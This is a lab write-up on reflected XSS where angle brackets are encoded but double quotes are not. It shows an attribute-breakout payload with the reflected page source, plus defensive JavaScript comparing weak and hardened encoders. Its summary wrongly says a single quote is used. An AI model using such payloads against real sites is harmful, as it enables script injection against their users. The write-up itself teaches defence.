Reflected XSS occurs when the payload is delivered in the HTTP request itself, reflected back in the response, and then executed by the browser

For this lab activity, the search bar is vulnerable to XSS even though angle brackets (<, >) are HTML-encoded, meaning those special characters are converted into safe text so the browser does not interpret them as markup

Let's try the basic payload we used in the previous lab

<script>alert()</script>

As you can see, the payload is displayed as plain text, so let's inspect the page source (Ctrl + U)

<section class=blog-header>
    <h1>0 search results for '&lt;script&gt;alert()&lt;/script&gt;'</h1>
    <hr>
</section>
<section class=search>
    <form action=/ method=GET>
        <input type=text placeholder='Search the blog...' name=search value="&lt;script&gt;alert()&lt;/script&gt;">
        <button type=submit class=button>Search</button>
    </form>

The angle brackets are being HTML-encoded: < becomes &lt; and > becomes &gt;

So our input is being reflected but displayed as plain text rather than being interpreted as HTML code

This means that payloads using angle brackets will be treated as plain text and will not execute successfully

Let's try using another payload

"onmouseover="alert(1)

So why did this payload work? Let's inspect the source code again

<section class=blog-header>
    <h1>0 search results for '"onmouseover="alert(1)'</h1>
    <hr>
</section>
<section class=search>
    <form action=/ method=GET>
        <input type=text placeholder='Search the blog...' name=search value=""onmouseover="alert(1)">
        <button type=submit class=button>Search</button>
    </form>

Our input is reflected inside the value attribute of the search input: value="USER INPUT"

So the browser takes our input in like this

value=""onmouseover="alert(1)"

The search parameter does not properly escape the double quotes (" ")

So what happens is

value=""

The first double quote closes the value attribute early, leaving it empty

onmouseover="alert(1)"

The remainder is then parsed as a new attribute on the same element: an onmouseover event handler

The alert happens when you hover the mouse over the search bar

In this lab, the search input is reflected inside an HTML attribute, and while angle brackets are HTML-encoded, double quotes are not escaped. This allows an attacker to break out of the value attribute with a single quote character and inject a new attribute, onmouseover="alert(1)". The browser interprets the injected attribute as part of the element, so when the user hovers over the search bar the event handler runs and the JavaScript triggers an alert
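To make the difference between the two encoding strategies concrete, here is an added example that is not part of the lab or of the original write-up. It reproduces the lab's weak encoder (angle brackets only) beside a hardened attribute encoder, renders a constructed copy of the search input with both payloads from this write-up, and uses a small attribute parser (an assumption, simplified compared with a real browser tokenizer) to show which attributes the browser would end up seeing.

```javascript
// Added example: compares the lab's angle-bracket-only encoding with a proper
// HTML attribute encoder. The template, parser and function names are
// constructed for this demonstration and are not the lab's own code.

// Constructed inputs: the two payloads used in the write-up above.
const PAYLOAD_SCRIPT = '<script>alert()</script>';
const PAYLOAD_ATTR = '"onmouseover="alert(1)';

// Weak encoder: mirrors what the lab's search page does. Only < and > become
// entities, so a double quote passes through and can close the attribute.
function encodeAngleBracketsOnly(input) {
  return input.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Hardened encoder (hypothetical fix): encodes every character that can end an
// attribute value or start markup. & is handled first so existing entities in
// the input are not double-decoded later.
function encodeForHtmlAttribute(input) {
  return input
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Constructed stand-in for the lab's search form template: the user's search
// term lands inside a double-quoted value attribute, exactly as in the page source.
function renderSearchInput(search, encode) {
  return `<input type=text placeholder='Search the blog...' name=search value="${encode(search)}">`;
}

// Minimal attribute parser (simplified; not a full HTML5 tokenizer). It walks
// the rendered tag the way a browser roughly would: a name, optionally followed
// by "=" and a quoted or unquoted value. Anything left after a closing quote is
// treated as the start of the next attribute, which is the breakout behaviour.
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+\s*/, '').replace(/\s*\/?>$/, '');
  const re = /([^\s"'=<>`]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>`]+))?/g;
  return Array.from(inner.matchAll(re), (m) => m[1].toLowerCase());
}

// Returns the event-handler attributes (on*) that the encoder let through.
// An empty list means the payload stayed inside the value attribute as text.
function injectedHandlers(search, encode) {
  return attributeNames(renderSearchInput(search, encode)).filter((n) => n.startsWith('on'));
}

// Demonstration when run directly: print both renderings for both payloads.
if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, encode] of [['weak', encodeAngleBracketsOnly], ['hardened', encodeForHtmlAttribute]]) {
    for (const payload of [PAYLOAD_SCRIPT, PAYLOAD_ATTR]) {
      console.log(`${label}: ${renderSearchInput(payload, encode)}`);
      console.log(`  handlers injected: ${JSON.stringify(injectedHandlers(payload, encode))}`);
    }
  }
}
```

With the weak encoder the `<script>` payload is neutralised, but the quote payload yields a second attribute named onmouseover; with the hardened encoder both payloads stay inside the value attribute as inert text, which is the fix for this class of reflected XSS: encode for the exact context the data is written into, not just angle brackets.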